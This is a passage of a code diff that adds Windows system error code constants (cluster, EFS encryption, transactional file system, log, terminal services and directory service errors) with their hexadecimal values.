+ERROR_REMOTE_STORAGE_MEDIA_ERROR = 0x00001100
+ERROR_NOT_A_REPARSE_POINT = 0x00001126
+ERROR_REPARSE_ATTRIBUTE_CONFLICT = 0x00001127
+ERROR_INVALID_REPARSE_DATA = 0x00001128
+ERROR_REPARSE_TAG_INVALID = 0x00001129
+ERROR_REPARSE_TAG_MISMATCH = 0x0000112a
+ERROR_APP_DATA_NOT_FOUND = 0x00001130
+ERROR_APP_DATA_EXPIRED = 0x00001131
+ERROR_APP_DATA_CORRUPT = 0x00001132
+ERROR_APP_DATA_LIMIT_EXCEEDED = 0x00001133
+ERROR_APP_DATA_REBOOT_REQUIRED = 0x00001134
+ERROR_SECUREBOOT_ROLLBACK_DETECTED = 0x00001144
+ERROR_SECUREBOOT_POLICY_VIOLATION = 0x00001145
+ERROR_SECUREBOOT_INVALID_POLICY = 0x00001146
+ERROR_SECUREBOOT_POLICY_PUBLISHER_NOT_FOUND = 0x00001147
+ERROR_SECUREBOOT_POLICY_NOT_SIGNED = 0x00001148
+ERROR_SECUREBOOT_NOT_ENABLED = 0x00001149
+ERROR_SECUREBOOT_FILE_REPLACED = 0x0000114a
+ERROR_OFFLOAD_READ_FLT_NOT_SUPPORTED = 0x00001158
+ERROR_OFFLOAD_WRITE_FLT_NOT_SUPPORTED = 0x00001159
+ERROR_OFFLOAD_READ_FILE_NOT_SUPPORTED = 0x0000115a
+ERROR_OFFLOAD_WRITE_FILE_NOT_SUPPORTED = 0x0000115b
+ERROR_VOLUME_NOT_SIS_ENABLED = 0x00001194
+ERROR_DEPENDENT_RESOURCE_EXISTS = 0x00001389
+ERROR_DEPENDENCY_NOT_FOUND = 0x0000138a
+ERROR_DEPENDENCY_ALREADY_EXISTS = 0x0000138b
+ERROR_RESOURCE_NOT_ONLINE = 0x0000138c
+ERROR_HOST_NODE_NOT_AVAILABLE = 0x0000138d
+ERROR_RESOURCE_NOT_AVAILABLE = 0x0000138e
+ERROR_RESOURCE_NOT_FOUND = 0x0000138f
+ERROR_SHUTDOWN_CLUSTER = 0x00001390
+ERROR_CANT_EVICT_ACTIVE_NODE = 0x00001391
+ERROR_OBJECT_ALREADY_EXISTS = 0x00001392
+ERROR_OBJECT_IN_LIST = 0x00001393
+ERROR_GROUP_NOT_AVAILABLE = 0x00001394
+ERROR_GROUP_NOT_FOUND = 0x00001395
+ERROR_GROUP_NOT_ONLINE = 0x00001396
+ERROR_HOST_NODE_NOT_RESOURCE_OWNER = 0x00001397
+ERROR_HOST_NODE_NOT_GROUP_OWNER = 0x00001398
+ERROR_RESMON_CREATE_FAILED = 0x00001399
+ERROR_RESMON_ONLINE_FAILED = 0x0000139a
+ERROR_RESOURCE_ONLINE = 0x0000139b
+ERROR_QUORUM_RESOURCE = 0x0000139c
+ERROR_NOT_QUORUM_CAPABLE = 0x0000139d
+ERROR_CLUSTER_SHUTTING_DOWN = 0x0000139e
+ERROR_INVALID_STATE = 0x0000139f
+ERROR_RESOURCE_PROPERTIES_STORED = 0x000013a0
+ERROR_NOT_QUORUM_CLASS = 0x000013a1
+ERROR_CORE_RESOURCE = 0x000013a2
+ERROR_QUORUM_RESOURCE_ONLINE_FAILED = 0x000013a3
+ERROR_QUORUMLOG_OPEN_FAILED = 0x000013a4
+ERROR_CLUSTERLOG_CORRUPT = 0x000013a5
+ERROR_CLUSTERLOG_RECORD_EXCEEDS_MAXSIZE = 0x000013a6
+ERROR_CLUSTERLOG_EXCEEDS_MAXSIZE = 0x000013a7
+ERROR_CLUSTERLOG_CHKPOINT_NOT_FOUND = 0x000013a8
+ERROR_CLUSTERLOG_NOT_ENOUGH_SPACE = 0x000013a9
+ERROR_QUORUM_OWNER_ALIVE = 0x000013aa
+ERROR_NETWORK_NOT_AVAILABLE = 0x000013ab
+ERROR_NODE_NOT_AVAILABLE = 0x000013ac
+ERROR_ALL_NODES_NOT_AVAILABLE = 0x000013ad
+ERROR_RESOURCE_FAILED = 0x000013ae
+ERROR_CLUSTER_INVALID_NODE = 0x000013af
+ERROR_CLUSTER_NODE_EXISTS = 0x000013b0
+ERROR_CLUSTER_JOIN_IN_PROGRESS = 0x000013b1
+ERROR_CLUSTER_NODE_NOT_FOUND = 0x000013b2
+ERROR_CLUSTER_LOCAL_NODE_NOT_FOUND = 0x000013b3
+ERROR_CLUSTER_NETWORK_EXISTS = 0x000013b4
+ERROR_CLUSTER_NETWORK_NOT_FOUND = 0x000013b5
+ERROR_CLUSTER_NETINTERFACE_EXISTS = 0x000013b6
+ERROR_CLUSTER_NETINTERFACE_NOT_FOUND = 0x000013b7
+ERROR_CLUSTER_INVALID_REQUEST = 0x000013b8
+ERROR_CLUSTER_INVALID_NETWORK_PROVIDER = 0x000013b9
+ERROR_CLUSTER_NODE_DOWN = 0x000013ba
+ERROR_CLUSTER_NODE_UNREACHABLE = 0x000013bb
+ERROR_CLUSTER_NODE_NOT_MEMBER = 0x000013bc
+ERROR_CLUSTER_JOIN_NOT_IN_PROGRESS = 0x000013bd
+ERROR_CLUSTER_INVALID_NETWORK = 0x000013be
+ERROR_CLUSTER_NODE_UP = 0x000013c0
+ERROR_CLUSTER_IPADDR_IN_USE = 0x000013c1
+ERROR_CLUSTER_NODE_NOT_PAUSED = 0x000013c2
+ERROR_CLUSTER_NO_SECURITY_CONTEXT = 0x000013c3
+ERROR_CLUSTER_NETWORK_NOT_INTERNAL = 0x000013c4
+ERROR_CLUSTER_NODE_ALREADY_UP = 0x000013c5
+ERROR_CLUSTER_NODE_ALREADY_DOWN = 0x000013c6
+ERROR_CLUSTER_NETWORK_ALREADY_ONLINE = 0x000013c7
+ERROR_CLUSTER_NETWORK_ALREADY_OFFLINE = 0x000013c8
+ERROR_CLUSTER_NODE_ALREADY_MEMBER = 0x000013c9
+ERROR_CLUSTER_LAST_INTERNAL_NETWORK = 0x000013ca
+ERROR_CLUSTER_NETWORK_HAS_DEPENDENTS = 0x000013cb
+ERROR_INVALID_OPERATION_ON_QUORUM = 0x000013cc
+ERROR_DEPENDENCY_NOT_ALLOWED = 0x000013cd
+ERROR_CLUSTER_NODE_PAUSED = 0x000013ce
+ERROR_NODE_CANT_HOST_RESOURCE = 0x000013cf
+ERROR_CLUSTER_NODE_NOT_READY = 0x000013d0
+ERROR_CLUSTER_NODE_SHUTTING_DOWN = 0x000013d1
+ERROR_CLUSTER_JOIN_ABORTED = 0x000013d2
+ERROR_CLUSTER_INCOMPATIBLE_VERSIONS = 0x000013d3
+ERROR_CLUSTER_MAXNUM_OF_RESOURCES_EXCEEDED = 0x000013d4
+ERROR_CLUSTER_SYSTEM_CONFIG_CHANGED = 0x000013d5
+ERROR_CLUSTER_RESOURCE_TYPE_NOT_FOUND = 0x000013d6
+ERROR_CLUSTER_RESTYPE_NOT_SUPPORTED = 0x000013d7
+ERROR_CLUSTER_RESNAME_NOT_FOUND = 0x000013d8
+ERROR_CLUSTER_NO_RPC_PACKAGES_REGISTERED = 0x000013d9
+ERROR_CLUSTER_OWNER_NOT_IN_PREFLIST = 0x000013da
+ERROR_CLUSTER_DATABASE_SEQMISMATCH = 0x000013db
+ERROR_RESMON_INVALID_STATE = 0x000013dc
+ERROR_CLUSTER_GUM_NOT_LOCKER = 0x000013dd
+ERROR_QUORUM_DISK_NOT_FOUND = 0x000013de
+ERROR_DATABASE_BACKUP_CORRUPT = 0x000013df
+ERROR_CLUSTER_NODE_ALREADY_HAS_DFS_ROOT = 0x000013e0
+ERROR_RESOURCE_PROPERTY_UNCHANGEABLE = 0x000013e1
+ERROR_CLUSTER_MEMBERSHIP_INVALID_STATE = 0x00001702
+ERROR_CLUSTER_QUORUMLOG_NOT_FOUND = 0x00001703
+ERROR_CLUSTER_MEMBERSHIP_HALT = 0x00001704
+ERROR_CLUSTER_INSTANCE_ID_MISMATCH = 0x00001705
+ERROR_CLUSTER_NETWORK_NOT_FOUND_FOR_IP = 0x00001706
+ERROR_CLUSTER_PROPERTY_DATA_TYPE_MISMATCH = 0x00001707
+ERROR_CLUSTER_EVICT_WITHOUT_CLEANUP = 0x00001708
+ERROR_CLUSTER_PARAMETER_MISMATCH = 0x00001709
+ERROR_NODE_CANNOT_BE_CLUSTERED = 0x0000170a
+ERROR_CLUSTER_WRONG_OS_VERSION = 0x0000170b
+ERROR_CLUSTER_CANT_CREATE_DUP_CLUSTER_NAME = 0x0000170c
+ERROR_CLUSCFG_ALREADY_COMMITTED = 0x0000170d
+ERROR_CLUSCFG_ROLLBACK_FAILED = 0x0000170e
+ERROR_CLUSCFG_SYSTEM_DISK_DRIVE_LETTER_CONFLICT = 0x0000170f
+ERROR_CLUSTER_OLD_VERSION = 0x00001710
+ERROR_CLUSTER_MISMATCHED_COMPUTER_ACCT_NAME = 0x00001711
+ERROR_CLUSTER_NO_NET_ADAPTERS = 0x00001712
+ERROR_CLUSTER_POISONED = 0x00001713
+ERROR_CLUSTER_GROUP_MOVING = 0x00001714
+ERROR_CLUSTER_RESOURCE_TYPE_BUSY = 0x00001715
+ERROR_RESOURCE_CALL_TIMED_OUT = 0x00001716
+ERROR_INVALID_CLUSTER_IPV6_ADDRESS = 0x00001717
+ERROR_CLUSTER_INTERNAL_INVALID_FUNCTION = 0x00001718
+ERROR_CLUSTER_PARAMETER_OUT_OF_BOUNDS = 0x00001719
+ERROR_CLUSTER_PARTIAL_SEND = 0x0000171a
+ERROR_CLUSTER_REGISTRY_INVALID_FUNCTION = 0x0000171b
+ERROR_CLUSTER_INVALID_STRING_TERMINATION = 0x0000171c
+ERROR_CLUSTER_INVALID_STRING_FORMAT = 0x0000171d
+ERROR_CLUSTER_DATABASE_TRANSACTION_IN_PROGRESS = 0x0000171e
+ERROR_CLUSTER_DATABASE_TRANSACTION_NOT_IN_PROGRESS = 0x0000171f
+ERROR_CLUSTER_NULL_DATA = 0x00001720
+ERROR_CLUSTER_PARTIAL_READ = 0x00001721
+ERROR_CLUSTER_PARTIAL_WRITE = 0x00001722
+ERROR_CLUSTER_CANT_DESERIALIZE_DATA = 0x00001723
+ERROR_DEPENDENT_RESOURCE_PROPERTY_CONFLICT = 0x00001724
+ERROR_CLUSTER_NO_QUORUM = 0x00001725
+ERROR_CLUSTER_INVALID_IPV6_NETWORK = 0x00001726
+ERROR_CLUSTER_INVALID_IPV6_TUNNEL_NETWORK = 0x00001727
+ERROR_QUORUM_NOT_ALLOWED_IN_THIS_GROUP = 0x00001728
+ERROR_DEPENDENCY_TREE_TOO_COMPLEX = 0x00001729
+ERROR_EXCEPTION_IN_RESOURCE_CALL = 0x0000172a
+ERROR_CLUSTER_RHS_FAILED_INITIALIZATION = 0x0000172b
+ERROR_CLUSTER_NOT_INSTALLED = 0x0000172c
+ERROR_CLUSTER_RESOURCES_MUST_BE_ONLINE_ON_THE_SAME_NODE = 0x0000172d
+ERROR_CLUSTER_MAX_NODES_IN_CLUSTER = 0x0000172e
+ERROR_CLUSTER_TOO_MANY_NODES = 0x0000172f
+ERROR_CLUSTER_OBJECT_ALREADY_USED = 0x00001730
+ERROR_NONCORE_GROUPS_FOUND = 0x00001731
+ERROR_FILE_SHARE_RESOURCE_CONFLICT = 0x00001732
+ERROR_CLUSTER_EVICT_INVALID_REQUEST = 0x00001733
+ERROR_CLUSTER_SINGLETON_RESOURCE = 0x00001734
+ERROR_CLUSTER_GROUP_SINGLETON_RESOURCE = 0x00001735
+ERROR_CLUSTER_RESOURCE_PROVIDER_FAILED = 0x00001736
+ERROR_CLUSTER_RESOURCE_CONFIGURATION_ERROR = 0x00001737
+ERROR_CLUSTER_GROUP_BUSY = 0x00001738
+ERROR_CLUSTER_NOT_SHARED_VOLUME = 0x00001739
+ERROR_CLUSTER_INVALID_SECURITY_DESCRIPTOR = 0x0000173a
+ERROR_CLUSTER_SHARED_VOLUMES_IN_USE = 0x0000173b
+ERROR_CLUSTER_USE_SHARED_VOLUMES_API = 0x0000173c
+ERROR_CLUSTER_BACKUP_IN_PROGRESS = 0x0000173d
+ERROR_NON_CSV_PATH = 0x0000173e
+ERROR_CSV_VOLUME_NOT_LOCAL = 0x0000173f
+ERROR_CLUSTER_WATCHDOG_TERMINATING = 0x00001740
+ERROR_CLUSTER_RESOURCE_VETOED_MOVE_INCOMPATIBLE_NODES = 0x00001741
+ERROR_CLUSTER_INVALID_NODE_WEIGHT = 0x00001742
+ERROR_CLUSTER_RESOURCE_VETOED_CALL = 0x00001743
+ERROR_RESMON_SYSTEM_RESOURCES_LACKING = 0x00001744
+ERROR_CLUSTER_RESOURCE_VETOED_MOVE_NOT_ENOUGH_RESOURCES_ON_DESTINATION = 0x00001745
+ERROR_CLUSTER_RESOURCE_VETOED_MOVE_NOT_ENOUGH_RESOURCES_ON_SOURCE = 0x00001746
+ERROR_CLUSTER_GROUP_QUEUED = 0x00001747
+ERROR_CLUSTER_RESOURCE_LOCKED_STATUS = 0x00001748
+ERROR_CLUSTER_SHARED_VOLUME_FAILOVER_NOT_ALLOWED = 0x00001749
+ERROR_CLUSTER_NODE_DRAIN_IN_PROGRESS = 0x0000174a
+ERROR_CLUSTER_DISK_NOT_CONNECTED = 0x0000174b
+ERROR_DISK_NOT_CSV_CAPABLE = 0x0000174c
+ERROR_RESOURCE_NOT_IN_AVAILABLE_STORAGE = 0x0000174d
+ERROR_CLUSTER_SHARED_VOLUME_REDIRECTED = 0x0000174e
+ERROR_CLUSTER_SHARED_VOLUME_NOT_REDIRECTED = 0x0000174f
+ERROR_CLUSTER_CANNOT_RETURN_PROPERTIES = 0x00001750
+ERROR_CLUSTER_RESOURCE_CONTAINS_UNSUPPORTED_DIFF_AREA_FOR_SHARED_VOLUMES = 0x00001751
+ERROR_CLUSTER_RESOURCE_IS_IN_MAINTENANCE_MODE = 0x00001752
+ERROR_CLUSTER_AFFINITY_CONFLICT = 0x00001753
+ERROR_CLUSTER_RESOURCE_IS_REPLICA_VIRTUAL_MACHINE = 0x00001754
+ERROR_ENCRYPTION_FAILED = 0x00001770
+ERROR_DECRYPTION_FAILED = 0x00001771
+ERROR_FILE_ENCRYPTED = 0x00001772
+ERROR_NO_RECOVERY_POLICY = 0x00001773
+ERROR_NO_EFS = 0x00001774
+ERROR_WRONG_EFS = 0x00001775
+ERROR_NO_USER_KEYS = 0x00001776
+ERROR_FILE_NOT_ENCRYPTED = 0x00001777
+ERROR_NOT_EXPORT_FORMAT = 0x00001778
+ERROR_FILE_READ_ONLY = 0x00001779
+ERROR_DIR_EFS_DISALLOWED = 0x0000177a
+ERROR_EFS_SERVER_NOT_TRUSTED = 0x0000177b
+ERROR_BAD_RECOVERY_POLICY = 0x0000177c
+ERROR_EFS_ALG_BLOB_TOO_BIG = 0x0000177d
+ERROR_VOLUME_NOT_SUPPORT_EFS = 0x0000177e
+ERROR_EFS_DISABLED = 0x0000177f
+ERROR_EFS_VERSION_NOT_SUPPORT = 0x00001780
+ERROR_CS_ENCRYPTION_INVALID_SERVER_RESPONSE = 0x00001781
+ERROR_CS_ENCRYPTION_UNSUPPORTED_SERVER = 0x00001782
+ERROR_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE = 0x00001783
+ERROR_CS_ENCRYPTION_NEW_ENCRYPTED_FILE = 0x00001784
+ERROR_CS_ENCRYPTION_FILE_NOT_CSE = 0x00001785
+ERROR_ENCRYPTION_POLICY_DENIES_OPERATION = 0x00001786
+ERROR_NO_BROWSER_SERVERS_FOUND = 0x000017e6
+SCHED_E_SERVICE_NOT_LOCALSYSTEM = 0x00001838
+ERROR_LOG_SECTOR_INVALID = 0x000019c8
+ERROR_LOG_SECTOR_PARITY_INVALID = 0x000019c9
+ERROR_LOG_SECTOR_REMAPPED = 0x000019ca
+ERROR_LOG_BLOCK_INCOMPLETE = 0x000019cb
+ERROR_LOG_INVALID_RANGE = 0x000019cc
+ERROR_LOG_BLOCKS_EXHAUSTED = 0x000019cd
+ERROR_LOG_READ_CONTEXT_INVALID = 0x000019ce
+ERROR_LOG_RESTART_INVALID = 0x000019cf
+ERROR_LOG_BLOCK_VERSION = 0x000019d0
+ERROR_LOG_BLOCK_INVALID = 0x000019d1
+ERROR_LOG_READ_MODE_INVALID = 0x000019d2
+ERROR_LOG_NO_RESTART = 0x000019d3
+ERROR_LOG_METADATA_CORRUPT = 0x000019d4
+ERROR_LOG_METADATA_INVALID = 0x000019d5
+ERROR_LOG_METADATA_INCONSISTENT = 0x000019d6
+ERROR_LOG_RESERVATION_INVALID = 0x000019d7
+ERROR_LOG_CANT_DELETE = 0x000019d8
+ERROR_LOG_CONTAINER_LIMIT_EXCEEDED = 0x000019d9
+ERROR_LOG_START_OF_LOG = 0x000019da
+ERROR_LOG_POLICY_ALREADY_INSTALLED = 0x000019db
+ERROR_LOG_POLICY_NOT_INSTALLED = 0x000019dc
+ERROR_LOG_POLICY_INVALID = 0x000019dd
+ERROR_LOG_POLICY_CONFLICT = 0x000019de
+ERROR_LOG_PINNED_ARCHIVE_TAIL = 0x000019df
+ERROR_LOG_RECORD_NONEXISTENT = 0x000019e0
+ERROR_LOG_RECORDS_RESERVED_INVALID = 0x000019e1
+ERROR_LOG_SPACE_RESERVED_INVALID = 0x000019e2
+ERROR_LOG_TAIL_INVALID = 0x000019e3
+ERROR_LOG_FULL = 0x000019e4
+ERROR_COULD_NOT_RESIZE_LOG = 0x000019e5
+ERROR_LOG_MULTIPLEXED = 0x000019e6
+ERROR_LOG_DEDICATED = 0x000019e7
+ERROR_LOG_ARCHIVE_NOT_IN_PROGRESS = 0x000019e8
+ERROR_LOG_ARCHIVE_IN_PROGRESS = 0x000019e9
+ERROR_LOG_EPHEMERAL = 0x000019ea
+ERROR_LOG_NOT_ENOUGH_CONTAINERS = 0x000019eb
+ERROR_LOG_CLIENT_ALREADY_REGISTERED = 0x000019ec
+ERROR_LOG_CLIENT_NOT_REGISTERED = 0x000019ed
+ERROR_LOG_FULL_HANDLER_IN_PROGRESS = 0x000019ee
+ERROR_LOG_CONTAINER_READ_FAILED = 0x000019ef
+ERROR_LOG_CONTAINER_WRITE_FAILED = 0x000019f0
+ERROR_LOG_CONTAINER_OPEN_FAILED = 0x000019f1
+ERROR_LOG_CONTAINER_STATE_INVALID = 0x000019f2
+ERROR_LOG_STATE_INVALID = 0x000019f3
+ERROR_LOG_PINNED = 0x000019f4
+ERROR_LOG_METADATA_FLUSH_FAILED = 0x000019f5
+ERROR_LOG_INCONSISTENT_SECURITY = 0x000019f6
+ERROR_LOG_APPENDED_FLUSH_FAILED = 0x000019f7
+ERROR_LOG_PINNED_RESERVATION = 0x000019f8
+ERROR_INVALID_TRANSACTION = 0x00001a2c
+ERROR_TRANSACTION_NOT_ACTIVE = 0x00001a2d
+ERROR_TRANSACTION_REQUEST_NOT_VALID = 0x00001a2e
+ERROR_TRANSACTION_NOT_REQUESTED = 0x00001a2f
+ERROR_TRANSACTION_ALREADY_ABORTED = 0x00001a30
+ERROR_TRANSACTION_ALREADY_COMMITTED = 0x00001a31
+ERROR_TM_INITIALIZATION_FAILED = 0x00001a32
+ERROR_RESOURCEMANAGER_READ_ONLY = 0x00001a33
+ERROR_TRANSACTION_NOT_JOINED = 0x00001a34
+ERROR_TRANSACTION_SUPERIOR_EXISTS = 0x00001a35
+ERROR_CRM_PROTOCOL_ALREADY_EXISTS = 0x00001a36
+ERROR_TRANSACTION_PROPAGATION_FAILED = 0x00001a37
+ERROR_CRM_PROTOCOL_NOT_FOUND = 0x00001a38
+ERROR_TRANSACTION_INVALID_MARSHALL_BUFFER = 0x00001a39
+ERROR_CURRENT_TRANSACTION_NOT_VALID = 0x00001a3a
+ERROR_TRANSACTION_NOT_FOUND = 0x00001a3b
+ERROR_RESOURCEMANAGER_NOT_FOUND = 0x00001a3c
+ERROR_ENLISTMENT_NOT_FOUND = 0x00001a3d
+ERROR_TRANSACTIONMANAGER_NOT_FOUND = 0x00001a3e
+ERROR_TRANSACTIONMANAGER_NOT_ONLINE = 0x00001a3f
+ERROR_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION = 0x00001a40
+ERROR_TRANSACTION_NOT_ROOT = 0x00001a41
+ERROR_TRANSACTION_OBJECT_EXPIRED = 0x00001a42
+ERROR_TRANSACTION_RESPONSE_NOT_ENLISTED = 0x00001a43
+ERROR_TRANSACTION_RECORD_TOO_LONG = 0x00001a44
+ERROR_IMPLICIT_TRANSACTION_NOT_SUPPORTED = 0x00001a45
+ERROR_TRANSACTION_INTEGRITY_VIOLATED = 0x00001a46
+ERROR_TRANSACTIONMANAGER_IDENTITY_MISMATCH = 0x00001a47
+ERROR_RM_CANNOT_BE_FROZEN_FOR_SNAPSHOT = 0x00001a48
+ERROR_TRANSACTION_MUST_WRITETHROUGH = 0x00001a49
+ERROR_TRANSACTION_NO_SUPERIOR = 0x00001a4a
+ERROR_HEURISTIC_DAMAGE_POSSIBLE = 0x00001a4b
+ERROR_TRANSACTIONAL_CONFLICT = 0x00001a90
+ERROR_RM_NOT_ACTIVE = 0x00001a91
+ERROR_RM_METADATA_CORRUPT = 0x00001a92
+ERROR_DIRECTORY_NOT_RM = 0x00001a93
+ERROR_TRANSACTIONS_UNSUPPORTED_REMOTE = 0x00001a95
+ERROR_LOG_RESIZE_INVALID_SIZE = 0x00001a96
+ERROR_OBJECT_NO_LONGER_EXISTS = 0x00001a97
+ERROR_STREAM_MINIVERSION_NOT_FOUND = 0x00001a98
+ERROR_STREAM_MINIVERSION_NOT_VALID = 0x00001a99
+ERROR_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION = 0x00001a9a
+ERROR_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT = 0x00001a9b
+ERROR_CANT_CREATE_MORE_STREAM_MINIVERSIONS = 0x00001a9c
+ERROR_REMOTE_FILE_VERSION_MISMATCH = 0x00001a9e
+ERROR_HANDLE_NO_LONGER_VALID = 0x00001a9f
+ERROR_NO_TXF_METADATA = 0x00001aa0
+ERROR_LOG_CORRUPTION_DETECTED = 0x00001aa1
+ERROR_CANT_RECOVER_WITH_HANDLE_OPEN = 0x00001aa2
+ERROR_RM_DISCONNECTED = 0x00001aa3
+ERROR_ENLISTMENT_NOT_SUPERIOR = 0x00001aa4
+ERROR_RECOVERY_NOT_NEEDED = 0x00001aa5
+ERROR_RM_ALREADY_STARTED = 0x00001aa6
+ERROR_FILE_IDENTITY_NOT_PERSISTENT = 0x00001aa7
+ERROR_CANT_BREAK_TRANSACTIONAL_DEPENDENCY = 0x00001aa8
+ERROR_CANT_CROSS_RM_BOUNDARY = 0x00001aa9
+ERROR_TXF_DIR_NOT_EMPTY = 0x00001aaa
+ERROR_INDOUBT_TRANSACTIONS_EXIST = 0x00001aab
+ERROR_TM_VOLATILE = 0x00001aac
+ERROR_ROLLBACK_TIMER_EXPIRED = 0x00001aad
+ERROR_TXF_ATTRIBUTE_CORRUPT = 0x00001aae
+ERROR_EFS_NOT_ALLOWED_IN_TRANSACTION = 0x00001aaf
+ERROR_TRANSACTIONAL_OPEN_NOT_ALLOWED = 0x00001ab0
+ERROR_LOG_GROWTH_FAILED = 0x00001ab1
+ERROR_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE = 0x00001ab2
+ERROR_TXF_METADATA_ALREADY_PRESENT = 0x00001ab3
+ERROR_TRANSACTION_SCOPE_CALLBACKS_NOT_SET = 0x00001ab4
+ERROR_TRANSACTION_REQUIRED_PROMOTION = 0x00001ab5
+ERROR_CANNOT_EXECUTE_FILE_IN_TRANSACTION = 0x00001ab6
+ERROR_TRANSACTIONS_NOT_FROZEN = 0x00001ab7
+ERROR_TRANSACTION_FREEZE_IN_PROGRESS = 0x00001ab8
+ERROR_NOT_SNAPSHOT_VOLUME = 0x00001ab9
+ERROR_NO_SAVEPOINT_WITH_OPEN_FILES = 0x00001aba
+ERROR_DATA_LOST_REPAIR = 0x00001abb
+ERROR_SPARSE_NOT_ALLOWED_IN_TRANSACTION = 0x00001abc
+ERROR_TM_IDENTITY_MISMATCH = 0x00001abd
+ERROR_FLOATED_SECTION = 0x00001abe
+ERROR_CANNOT_ACCEPT_TRANSACTED_WORK = 0x00001abf
+ERROR_CANNOT_ABORT_TRANSACTIONS = 0x00001ac0
+ERROR_BAD_CLUSTERS = 0x00001ac1
+ERROR_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION = 0x00001ac2
+ERROR_VOLUME_DIRTY = 0x00001ac3
+ERROR_NO_LINK_TRACKING_IN_TRANSACTION = 0x00001ac4
+ERROR_OPERATION_NOT_SUPPORTED_IN_TRANSACTION = 0x00001ac5
+ERROR_EXPIRED_HANDLE = 0x00001ac6
+ERROR_TRANSACTION_NOT_ENLISTED = 0x00001ac7
+ERROR_CTX_WINSTATION_NAME_INVALID = 0x00001b59
+ERROR_CTX_INVALID_PD = 0x00001b5a
+ERROR_CTX_PD_NOT_FOUND = 0x00001b5b
+ERROR_CTX_WD_NOT_FOUND = 0x00001b5c
+ERROR_CTX_CANNOT_MAKE_EVENTLOG_ENTRY = 0x00001b5d
+ERROR_CTX_SERVICE_NAME_COLLISION = 0x00001b5e
+ERROR_CTX_CLOSE_PENDING = 0x00001b5f
+ERROR_CTX_NO_OUTBUF = 0x00001b60
+ERROR_CTX_MODEM_INF_NOT_FOUND = 0x00001b61
+ERROR_CTX_INVALID_MODEMNAME = 0x00001b62
+ERROR_CTX_MODEM_RESPONSE_ERROR = 0x00001b63
+ERROR_CTX_MODEM_RESPONSE_TIMEOUT = 0x00001b64
+ERROR_CTX_MODEM_RESPONSE_NO_CARRIER = 0x00001b65
+ERROR_CTX_MODEM_RESPONSE_NO_DIALTONE = 0x00001b66
+ERROR_CTX_MODEM_RESPONSE_BUSY = 0x00001b67
+ERROR_CTX_MODEM_RESPONSE_VOICE = 0x00001b68
+ERROR_CTX_TD_ERROR = 0x00001b69
+ERROR_CTX_WINSTATION_NOT_FOUND = 0x00001b6e
+ERROR_CTX_WINSTATION_ALREADY_EXISTS = 0x00001b6f
+ERROR_CTX_WINSTATION_BUSY = 0x00001b70
+ERROR_CTX_BAD_VIDEO_MODE = 0x00001b71
+ERROR_CTX_GRAPHICS_INVALID = 0x00001b7b
+ERROR_CTX_LOGON_DISABLED = 0x00001b7d
+ERROR_CTX_NOT_CONSOLE = 0x00001b7e
+ERROR_CTX_CLIENT_QUERY_TIMEOUT = 0x00001b80
+ERROR_CTX_CONSOLE_DISCONNECT = 0x00001b81
+ERROR_CTX_CONSOLE_CONNECT = 0x00001b82
+ERROR_CTX_SHADOW_DENIED = 0x00001b84
+ERROR_CTX_WINSTATION_ACCESS_DENIED = 0x00001b85
+ERROR_CTX_INVALID_WD = 0x00001b89
+ERROR_CTX_SHADOW_INVALID = 0x00001b8a
+ERROR_CTX_SHADOW_DISABLED = 0x00001b8b
+ERROR_CTX_CLIENT_LICENSE_IN_USE = 0x00001b8c
+ERROR_CTX_CLIENT_LICENSE_NOT_SET = 0x00001b8d
+ERROR_CTX_LICENSE_NOT_AVAILABLE = 0x00001b8e
+ERROR_CTX_LICENSE_CLIENT_INVALID = 0x00001b8f
+ERROR_CTX_LICENSE_EXPIRED = 0x00001b90
+ERROR_CTX_SHADOW_NOT_RUNNING = 0x00001b91
+ERROR_CTX_SHADOW_ENDED_BY_MODE_CHANGE = 0x00001b92
+ERROR_ACTIVATION_COUNT_EXCEEDED = 0x00001b93
+ERROR_CTX_WINSTATIONS_DISABLED = 0x00001b94
+ERROR_CTX_ENCRYPTION_LEVEL_REQUIRED = 0x00001b95
+ERROR_CTX_SESSION_IN_USE = 0x00001b96
+ERROR_CTX_NO_FORCE_LOGOFF = 0x00001b97
+ERROR_CTX_ACCOUNT_RESTRICTION = 0x00001b98
+ERROR_RDP_PROTOCOL_ERROR = 0x00001b99
+ERROR_CTX_CDM_CONNECT = 0x00001b9a
+ERROR_CTX_CDM_DISCONNECT = 0x00001b9b
+ERROR_CTX_SECURITY_LAYER_ERROR = 0x00001b9c
+ERROR_TS_INCOMPATIBLE_SESSIONS = 0x00001b9d
+ERROR_TS_VIDEO_SUBSYSTEM_ERROR = 0x00001b9e
+FRS_ERR_INVALID_API_SEQUENCE = 0x00001f41
+FRS_ERR_STARTING_SERVICE = 0x00001f42
+FRS_ERR_STOPPING_SERVICE = 0x00001f43
+FRS_ERR_INTERNAL_API = 0x00001f44
+FRS_ERR_INTERNAL = 0x00001f45
+FRS_ERR_SERVICE_COMM = 0x00001f46
+FRS_ERR_INSUFFICIENT_PRIV = 0x00001f47
+FRS_ERR_AUTHENTICATION = 0x00001f48
+FRS_ERR_PARENT_INSUFFICIENT_PRIV = 0x00001f49
+FRS_ERR_PARENT_AUTHENTICATION = 0x00001f4a
+FRS_ERR_CHILD_TO_PARENT_COMM = 0x00001f4b
+FRS_ERR_PARENT_TO_CHILD_COMM = 0x00001f4c
+FRS_ERR_SYSVOL_POPULATE = 0x00001f4d
+FRS_ERR_SYSVOL_POPULATE_TIMEOUT = 0x00001f4e
+FRS_ERR_SYSVOL_IS_BUSY = 0x00001f4f
+FRS_ERR_SYSVOL_DEMOTE = 0x00001f50
+FRS_ERR_INVALID_SERVICE_PARAMETER = 0x00001f51
+ERROR_DS_NOT_INSTALLED = 0x00002008
+ERROR_DS_MEMBERSHIP_EVALUATED_LOCALLY = 0x00002009
+ERROR_DS_NO_ATTRIBUTE_OR_VALUE = 0x0000200a
+ERROR_DS_INVALID_ATTRIBUTE_SYNTAX = 0x0000200b
+ERROR_DS_ATTRIBUTE_TYPE_UNDEFINED = 0x0000200c
+ERROR_DS_ATTRIBUTE_OR_VALUE_EXISTS = 0x0000200d
+ERROR_DS_BUSY = 0x0000200e
+ERROR_DS_UNAVAILABLE = 0x0000200f
+ERROR_DS_NO_RIDS_ALLOCATED = 0x00002010
+ERROR_DS_NO_MORE_RIDS = 0x00002011
